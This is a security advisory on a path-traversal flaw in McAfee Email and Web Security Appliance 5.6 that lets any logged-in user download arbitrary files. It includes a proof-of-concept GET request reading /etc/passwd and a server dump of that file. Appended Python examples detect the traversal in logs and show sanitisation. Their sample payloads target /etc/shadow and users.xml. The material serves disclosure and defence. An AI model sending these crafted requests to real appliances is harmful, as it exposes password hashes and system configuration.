
McAfee Email and Web Security Appliance v5.6 – Arbitrary file download is possible with a crafted URL, when logged in as any user

Summary

Name: McAfee Email and Web Security Appliance v5.6 – Arbitrary file
download is possible with a crafted URL, when logged in as any user
Release Date: 30 November 2012
Reference: NGS00158
Discoverer: Ben Williams 
Vendor: McAfee
Vendor Reference:
Systems Affected:
Risk: Medium
Status: Published

TimeLine

Discovered: 26 November 2011
Released: 29 November 2011
Approved: 29 November 2011
Reported:  4 December 2011
Fixed: 13 March 2012
Published: 30 November 2012

Description

McAfee Email and Web Security Appliance v5.6 – Arbitrary file download is
possible with a crafted URL, when logged in as any user

McAfee Email and Web Security Appliance v5.6 (v5.6 1741.115) is prone to
arbitrary file download via a crafted URL, by any authenticated user.

The exploit would enable an attacker to:

 – download arbitrary files from the appliance, once they have gained access
to the UI
 – read any file the Apache user can read, since the download runs with that
user's file permissions

Technical Details

I. VULNERABILITY

McAfee Email and Web Security Appliance v5.6 – Arbitrary file download is
possible with a crafted URL, when logged in as any user

II. BACKGROUND

McAfee (owned by Intel) is one of the world's best-known providers of IT
security products.

The McAfee Email and Web Security Appliance provides security for email and
web protocols, and acts as a firewall and gateway solution.

http://www.mcafee.com/

III. DESCRIPTION

McAfee Email and Web Security Appliance v5.6 – Arbitrary file download is
possible with a crafted URL, when logged in as any user

IV. PROOF OF CONCEPT

Arbitrary file download is possible with a crafted URL, when logged in as
any user (even a low-privileged “report user” can do this).

This is a simple GET request. The downloaded file is always named “backup”,
but it appears possible to download any file that the apache user can read.
The trailing %00 is a NUL byte, presumably there to cut off anything the CGI
script appends to the supplied path before the file is opened.

Various sensitive files can be recovered, such as files containing user
password hashes and application or operating system configuration files,
for example:
https://192.168.233.40/scmadmin/19320/cgi-bin/handle_download/backup?command=../../../config/wsxmlconf/wsadmin/users.xml%00

GET /scmadmin/19320/cgi-bin/handle_download/backup?command=../../../etc/passwd%00 HTTP/1.1
Host: 192.168.233.40
User-Agent: Mozilla/5.0 (X11; Linux i686 on x86_64; rv:7.0.1) Gecko/20100101 Firefox/7.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Connection: keep-alive
Referer: https://192.168.233.40/scmadmin/19320/en_US/html/SysAdmin.html
Cookie: SCMUserSettings=%3Dnull%26popcheck%3D1%26lastUser%3Dscmadmin%26lang%3Den_US%26last_page_id%3Dmessage_search; SHOW_BANNER_NOTICE=BannerShown%3D1; ws_session=SID%3DSID%3A04367A5D-0C6C-4B6E-B673-7DFD53E73157

HTTP/1.1 200 OK
Date: Sat, 26 Nov 2011 19:40:54 GMT
Server: Apache/2.0.63 (Unix)
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: application/zip;
Content-Length: 763

Copyright (C) 2007 McAfee Inc. All rights reserved.
root:x:0:0:root:/root:/bin/bash
daemon:x:2:2:daemon:/sbin:
lp:x:4:7:lp:/var/spool/lpd:
sync:x:5:0:sync:/sbin:/bin/sync
mail:x:8:12:mail:/var/spool/mail:
uucp:x:10:14:uucp:/:
nobody:x:99:99:Nobody:/:
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/bin/false
rpc:x:32:32:Portmapper RPC user:/:/bin/false
support:x:500:500:Support Account:/home/support:/opt/NETAwss/mgmt/mash
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
ldap:x:55:55:LDAP User:/var/lib/ldap:/sbin/nologin
radvd:x:75:75:radvd user:/:/sbin/nologin
named:x:25:25:Named:/var/named:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
apache:x:48:48:Apache:/opt/NETAwss/ui/www:/sbin/nologin
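A detection check for the request pattern shown above, added here as an example; it is not part of the advisory and is neither McAfee's nor NGS's code. It parses Apache combined-format access log lines (the lines below are constructed for the example, not taken from an appliance), percent-decodes the command parameter and flags every handle_download request whose value carries a NUL byte or normalises to a path outside the download directory. It goes a little beyond the advisory by also decoding double-encoded variants (%252e%252e%252f), which the advisory does not mention.

```python
import re
import posixpath
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed Apache combined-format log lines (not from the advisory or an
# appliance). Line 2 carries the advisory's /etc/passwd request, line 3 the
# users.xml request with the dots and slashes percent-encoded, line 4 a
# double-encoded variant that the advisory does not show.
SAMPLE_LOG = """\
10.0.0.5 - - [26/Nov/2011:19:38:10 +0000] "GET /scmadmin/19320/cgi-bin/handle_download/backup?command=backup-20111126.zip HTTP/1.1" 200 48211 "-" "Mozilla/5.0"
10.0.0.5 - - [26/Nov/2011:19:40:54 +0000] "GET /scmadmin/19320/cgi-bin/handle_download/backup?command=../../../etc/passwd%00 HTTP/1.1" 200 763 "-" "Mozilla/5.0"
10.0.0.5 - - [26/Nov/2011:19:41:30 +0000] "GET /scmadmin/19320/cgi-bin/handle_download/backup?command=%2e%2e%2f%2e%2e%2fconfig%2fwsxmlconf%2fwsadmin%2fusers.xml HTTP/1.1" 200 2201 "-" "Mozilla/5.0"
10.0.0.5 - - [26/Nov/2011:19:41:58 +0000] "GET /scmadmin/19320/cgi-bin/handle_download/backup?command=..%252f..%252fetc%252fshadow HTTP/1.1" 200 1108 "-" "Mozilla/5.0"
10.0.0.5 - - [26/Nov/2011:19:42:02 +0000] "GET /scmadmin/19320/en_US/html/SysAdmin.html HTTP/1.1" 200 9120 "-" "Mozilla/5.0"
"""

# Apache combined log format: client, ident, user, [timestamp], "request", status, size, ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3}) (?P<size>\S+)'
)


def decode_param(value, rounds=2):
    """Percent-decode up to `rounds` times so single- and double-encoded
    traversal sequences both end up as plain '../'. Decoding a string with
    no escapes is a no-op, so the loop stops early for clean values."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def is_traversal(command):
    """True when `command`, taken relative to a fixed download directory,
    would escape that directory or carries a NUL byte (the advisory's %00)."""
    if "\x00" in command:
        return True
    # normpath folds "logs/../x" to "x" and leaves a leading ".." only when
    # the path really climbs above its starting directory.
    normalised = posixpath.normpath(command)
    return normalised == ".." or normalised.startswith(("../", "/"))


def find_traversal_downloads(log_text):
    """Return (timestamp, client, decoded command, status) for each
    handle_download request whose command parameter is a traversal attempt."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        url = urlsplit(m["target"])
        if "/cgi-bin/handle_download/" not in url.path:
            continue
        # parse_qs already decodes once; decode_param handles further layers.
        for raw in parse_qs(url.query, keep_blank_values=True).get("command", []):
            command = decode_param(raw)
            if is_traversal(command):
                hits.append((m["ts"], m["ip"], command, int(m["status"])))
    return hits


if __name__ == "__main__":
    for ts, ip, command, status in find_traversal_downloads(SAMPLE_LOG):
        print(f"{ts} {ip} status={status} command={command!r}")
```

A 200 status on a flagged request is the signal that matters: the appliance returned the file. Apache records the request line as received, so the %00 and any percent-encoding appear literally in the log, which is why the check decodes before normalising rather than grepping for "../".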

Fix Information

Proper sanitisation of user-supplied data, rather than reliance on Perl's
“-wT” switches (warnings and taint mode) alone. Taint mode only forces
tainted input through an untainting pattern before it reaches open(); a
permissive pattern still lets “../” sequences and a trailing NUL byte
through.

Update to Email and Web Security 5.5 Patch 6, Email and Web Security 5.6
Patch 3, or McAfee Email Gateway 7.0 Patch 1.
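The sanitisation the fix calls for, shown as an added Python example. The appliance's handler is a Perl CGI script; this is neither McAfee's code nor the actual patch, just the same idea in Python. BACKUP_DIR and the accepted file-name pattern are assumptions, since the advisory does not name the directory the “backup” download reads from. vulnerable_resolve emulates the described flaw, including the libc-level NUL truncation the %00 suffix relies on; safe_resolve rejects NUL bytes, allow-lists the file name and then checks that the normalised path still lies under BACKUP_DIR.

```python
import posixpath
import re

# Hypothetical download directory: the advisory does not say where the
# appliance keeps the file it serves as "backup".
BACKUP_DIR = "/opt/NETAwss/backups"

# Allow-list for the file name: one path component, no leading dot, no
# separators, a fixed set of extensions. Assumed for the example.
SAFE_NAME = re.compile(r"^[A-Za-z0-9_][A-Za-z0-9_.-]{0,127}\.(zip|tgz)$")


def vulnerable_resolve(command):
    """Emulates the flaw the advisory describes: the user-supplied value is
    appended to the directory and handed straight to the OS. The C-level
    open() stops at the first NUL, so anything after %00 is dropped, and the
    kernel resolves the '..' components, so the path leaves BACKUP_DIR."""
    path = BACKUP_DIR + "/" + command
    path = path.split("\x00", 1)[0]        # NUL truncation as libc sees it
    return posixpath.normpath(path)        # '..' resolved as the kernel would


def safe_resolve(command):
    """Hardened form: reject NUL, allow-list the name, then confirm that the
    joined and normalised path is still inside BACKUP_DIR."""
    if "\x00" in command:
        raise ValueError("NUL byte in file name")
    if not SAFE_NAME.match(command):
        raise ValueError("file name not in allow-list")
    candidate = posixpath.normpath(posixpath.join(BACKUP_DIR, command))
    # Defence in depth: if the allow-list is ever loosened, the containment
    # check still refuses anything that escapes the directory.
    if posixpath.commonpath([BACKUP_DIR, candidate]) != BACKUP_DIR:
        raise ValueError("path escapes download directory")
    return candidate


def is_rejected(command):
    """Convenience wrapper: True when safe_resolve refuses `command`."""
    try:
        safe_resolve(command)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    payload = "../../../etc/passwd\x00"
    print("vulnerable:", vulnerable_resolve(payload))
    print("hardened rejects payload:", is_rejected(payload))
    print("hardened accepts:", safe_resolve("backup-20111126.zip"))
```

In production the containment check should run on the symlink-resolved path (os.path.realpath) and the file should be opened with O_NOFOLLOW, because a symlink inside the directory can point outside it; the allow-list is what keeps the path check simple enough to reason about.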